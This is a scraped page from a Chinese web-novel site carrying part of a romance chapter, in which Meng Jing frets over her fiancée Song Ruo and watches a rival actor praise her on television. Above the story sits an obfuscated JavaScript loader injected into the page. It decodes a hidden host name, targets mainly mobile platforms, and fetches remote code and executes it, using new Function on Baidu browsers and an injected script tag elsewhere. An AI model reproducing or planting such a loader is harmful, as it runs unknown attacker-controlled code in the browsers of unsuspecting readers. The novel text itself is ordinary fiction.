98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(81(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

说完就斜睨着未婚妻。她希望她借此发个脾气。一脚把她从床上踹下去也好。

然而若若并没有,她什么也没说,站起来,起身去了外边。

孟璟悻悻然,觉得未婚妻有可能要拿小皮鞭过来抽打。

也应该,徒手打的话,老婆手疼。

可五分钟之后,若若再次现身,手里没有小皮鞭,反而多了个小托盘,上边放着几个碗碟。

孟璟靠在床头,浑身僵僵的,看她坐下来,硬着头皮撒娇到底老婆喂。

这下总该骂人了吧!

并没有,若若真的开始喂她。还特别体贴周到地让她先漱了漱口。

她一顿早饭吃得战战兢兢。粥可口不可口也没吃出半分滋味来。下粥就的不是配菜,而是若若的脸。所谓秀色可餐。孟璟记得两个人去拍婚纱照时她就有这么个想法她所知道的语言无法形容小药瓶子的美。这都大几年过去了,她发现面对她的时候,她依旧是词穷的。她只有在喝完粥以后,下意识地说了句最朴素的我老婆真好看。

宋若说了声谢谢。替她擦了擦嘴,收拾好餐具,站起身。

等等。鲸鱼拉住她的手。

宋若低头凝视她。

老婆你不能对我这么好啊。鲸鱼做瑟瑟发抖状,语重心长地,我好害怕。

宋若没动,等她的下文。

你还把我当病人是不是?孟璟拍了拍胸口,我现在很结实,完全好了,你要打要骂都ok的啊,不要克制你自己!

宋若心里有些想笑,又笑不出来,不打你。

鲸鱼立刻蹬鼻子上脸,那亲我?说着噘嘴凑上来。两只眼睛忽闪忽闪,充满期待。

若若的表情看不出什么端倪来,依旧非常清淡,平和,不见波澜。

她就那样高深莫测地走了出去。

她一出门,孟璟立刻就空虚寂寞冷了,刷地蹦下床,去洗了脸,等她回到客厅,未婚妻已经换好了战斗服,美得冒泡,是个要出门的样子。

老婆,你,你干嘛去。她拦在门口。不是真的要和谢琼去看那个该死的画展吧。她觉得昨晚老婆就是逢场作戏,要敲打她。

工作。宋若若语气还是平静,晚上我回学校。这两天有考试。

孟璟稍微松了一口气,是的了,老婆还在念书呢,明年夏天毕业。想想还是不放心,问了一句那,那个画展,不去了对吧?

宋若踩了一双卡其色雪地靴,朝她意味深长地看一眼,微笑改期了。

不行不行,不许去。孟璟上来抱住。

宋若轻轻推开她,有事给我电话。

嗯,我会乖乖的。孟璟能感到自己的狗尾巴在身后轻轻摇摆。

门哐当一声在她眼前合上。

孟璟下一秒立刻回过味来,不行,得行动起来。

换衣服的时候她觉得自己不够香,该先洗个澡再出门。

昨晚似乎还出了汗。

洗完澡坐在沙发上擦头发,她心血来潮开了电视,然后她发现,她的猜想半点没错。

自己依然是那个情敌满天下的抹香鲸。

正在播的是一档访谈节目,嘉宾竟然是季铭。这人,从若若搭第一部 戏就迷上她了,追着她去拍《安知我心》,大好的情势,不去趁热打铁,接男主男二,居然甘心当了个男n。总之狼子野心,其心可诛。孟璟擦头发的动作一下比一下重,目光冷冷盯住电视屏幕。

季铭最近发展挺不错,刚拿了个视帝。可以说与他持之以恒的努力分不开吧。

当主持人问到他最感谢的人时,孟璟和观众席上的观众一个心思,无非又是感谢爸妈,感谢tv,感谢tv巴拉巴拉。

谁知道这哥们儿不走寻常路,含笑说出一个名字最感谢宋若。

孟璟心下一声卧槽,刚摁开的电吹风也关上了。

观众席的反应也是一阵沸腾。谁这么直接感谢某个圈内人啊。

孟璟想,这么直呼其名,cue她家若若,要么是不避嫌疑的真心感谢,要么就是蹭热度呗。孟璟决定先看看他怎么说,然后再想怎么弄他。

季铭大致说了说自己怎么和宋若相遇,他又怎么地一见倾心,后来在她十八岁生日那天表白了,说自己一直在等她长大。那个时候,你们知道,我的名气就那样,从没红过,却是个过了气的,戏路也窄。而若若呢,像早晨七八点钟的太阳,刚刚升起,前途无量。我能鼓起勇气和她告白,不是缺少自知之明,是因为我真心喜欢她而且那时候她仿佛生活里遇到了什么不太开心的事,状态,不是很好,我想陪着她不出意料她拒绝了我。

台上台下一阵骚动。孟璟靠在沙发上,一动不动。

她拒绝你,所以你大受刺激,从此发奋?主持人有自己的一套思路。

季铭摇了摇头,依然是清雅的笑,不是刺激,是鼓励。我那时候受的打击已经够多了。我问她,是不是因为我太不红了哎就是,就那种特别loser的口气。是不是我更红一点,一切就都会不一样?然后若若说不是,还送了我一句话,让我受用至今。

主持人配合地露出惊异的神色,什么话?

乾坤未定,你我皆是黑马。

主持人哗了一声,果然正能量女神啊。十八岁那她第二年就拿奖了,是不是?她成了黑马,季铭你也是啊,你们现在都是千里马了。

这时候门铃作响。

孟璟揉揉半干的头发,起身去开门。

第99章

来的是盛雪,孟璟开门就迎来一顿暴揍。

盛雪追着她在屋子里跑了三圈,孟璟最后投降了,乒乒乓乓天下无双,打到精疲力竭之后,两个人才总算消停。孟璟略尽地主之谊,给发小泡了茶,还把家里的水果拿出来招待她。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间